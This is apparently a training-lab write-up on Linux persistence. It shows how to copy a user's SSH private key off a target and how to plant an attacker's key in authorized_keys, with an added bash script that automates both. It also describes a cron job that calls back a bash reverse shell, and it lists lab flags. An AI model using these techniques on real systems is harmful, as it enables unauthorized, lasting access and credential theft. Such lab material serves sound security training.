
🔬Linux Persistence

Lab 1 - SSH

🔬 Maintaining access I

  • Target IP: 192.3.140.3

  • Persistence via SSH Keys, even after user credentials are modified

  • Initial credentials: student:password

ip -br -c a
	192.3.140.2/24

SSH Keys

ls -al
    drwxr-xr-x 1 student student 4096 Apr 29 13:40 .
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 ..
    -rw------- 1 student student    7 Apr 29 13:40 .bash_history
    drwx------ 2 student student 4096 Apr 29 13:39 .cache
    drwxr-xr-x 1 root    root    4096 Apr 26  2019 .ssh
    -rw-r--r-- 1 student student   91 Apr 26  2019 wait

cat wait
    Delete this file to trigger connection reset.
    Delete it only after planting the backdoor.

cd .ssh
ls
	authorized_keys  id_rsa
  • Display the private key stored in id_rsa; this is the key that will be reused for access after the credentials change

Persistence

  • Exit the SSH session and download the id_rsa file to the attacking machine

  • Log back into the target system and trigger the password and connection reset (delete the wait file, as its contents instruct)

  • Connect to the target using the downloaded private key; the old password no longer works, but the target's authorized_keys still trusts the key

Reveal Flag: 🚩

689227a4f1b97afe1ff5ebaf85babc19

📌 Instead of reusing the user's own private key, an attacker typically generates an SSH key pair on the attacking machine, keeps the private key there, and appends the public key to authorized_keys in the target user's ~/.ssh directory. Access then depends only on that authorized_keys entry staying in place, not on the user's password or on the user's own key pair (which may be rotated, or be passphrase-protected in the first place).
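The following script is an added example and not part of the original lab; it covers both the lab's steps (take the existing id_rsa and log in with it) and the note's preferred method (plant your own key). It assumes the lab's target 192.3.140.3 and user student from the page; the key file names under ~/.ssh, the /tmp staging path and the optional `steal`/`plant` arguments are this example's own choices. The `plant` path must run while student:password still works, since ssh-copy-id authenticates with the password to install the key.

```shell
#!/usr/bin/env bash
# Added example (not from the original lab page). Assumes target
# 192.3.140.3 and user "student"; everything else is this script's choice.
set -eu

TARGET=${TARGET:-192.3.140.3}
USER_NAME=${USER_NAME:-student}

# Copy private key material into place with the mode ssh insists on:
# ssh refuses a key file that is group- or world-readable.
install_private_key() {
    src=$1 dst=$2
    umask 077
    cp "$src" "$dst"
    chmod 600 "$dst"
    ls -ld "$dst" | cut -c1-10      # prints "-rw-------"
}

# Append one public key to an authorized_keys file exactly once, creating
# ~/.ssh (700) and the file (600) as sshd's StrictModes expects. This is
# what ssh-copy-id does on the remote side.
append_authorized_key() {
    pubkey=$1 file=$2
    mkdir -p "$(dirname "$file")"
    chmod 700 "$(dirname "$file")"
    touch "$file"
    chmod 600 "$file"
    if ! grep -qxF "$pubkey" "$file"; then
        printf '%s\n' "$pubkey" >> "$file"
    fi
    grep -cxF "$pubkey" "$file"     # prints 1 even when called twice
}

# Option A (what the lab does): fetch the user's own id_rsa, then log in
# with it after the password reset.
steal_and_use() {
    scp "$USER_NAME@$TARGET:.ssh/id_rsa" /tmp/stolen_id_rsa
    install_private_key /tmp/stolen_id_rsa "$HOME/.ssh/student_target"
    ssh -i "$HOME/.ssh/student_target" "$USER_NAME@$TARGET"
}

# Option B (the note's method): generate a key pair here, push only the
# public half, then prove key-only auth works with passwords disabled.
plant_own_key() {
    key="$HOME/.ssh/target_persist"
    # The -C comment lands verbatim in the target's authorized_keys, so do
    # not let the default (attacker user@host) leak there.
    [ -f "$key" ] || ssh-keygen -t ed25519 -N '' -C "$USER_NAME@$TARGET" -f "$key"
    ssh-copy-id -i "$key.pub" "$USER_NAME@$TARGET"
    ssh -i "$key" -o PasswordAuthentication=no "$USER_NAME@$TARGET" id
}

# Only talk to the target when explicitly asked; the two helpers above can
# be exercised locally on a scratch directory.
case "${1:-}" in
    steal) steal_and_use ;;
    plant) plant_own_key ;;
esac
```

After planting, `ls -la ~/.ssh` and `cat ~/.ssh/authorized_keys` on the target show exactly what a defender would see: a new public key line (with whatever comment you chose) and, if you had to create the directory, a fresh mtime on ~/.ssh.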


Lab 2 - Cron Jobs

🔬 T1168: Local Job Scheduling (this ATT&CK ID has since been deprecated; the cron technique now lives under T1053.003, Scheduled Task/Job: Cron)

Cron Jobs

Persistence

  • Create a new cron job as the student user

    • The command inside the cron job runs with the student user's permissions, so the shell you get back is an unprivileged one

  • Log back into the target system and trigger the password and connection reset (delete the wait file)

  • Set up a nc listener on the attacking machine and wait for the bash reverse shell from the cron job, which fires every minute

Reveal Flag: 🚩

79969e32981f722464fde4ce7f208883

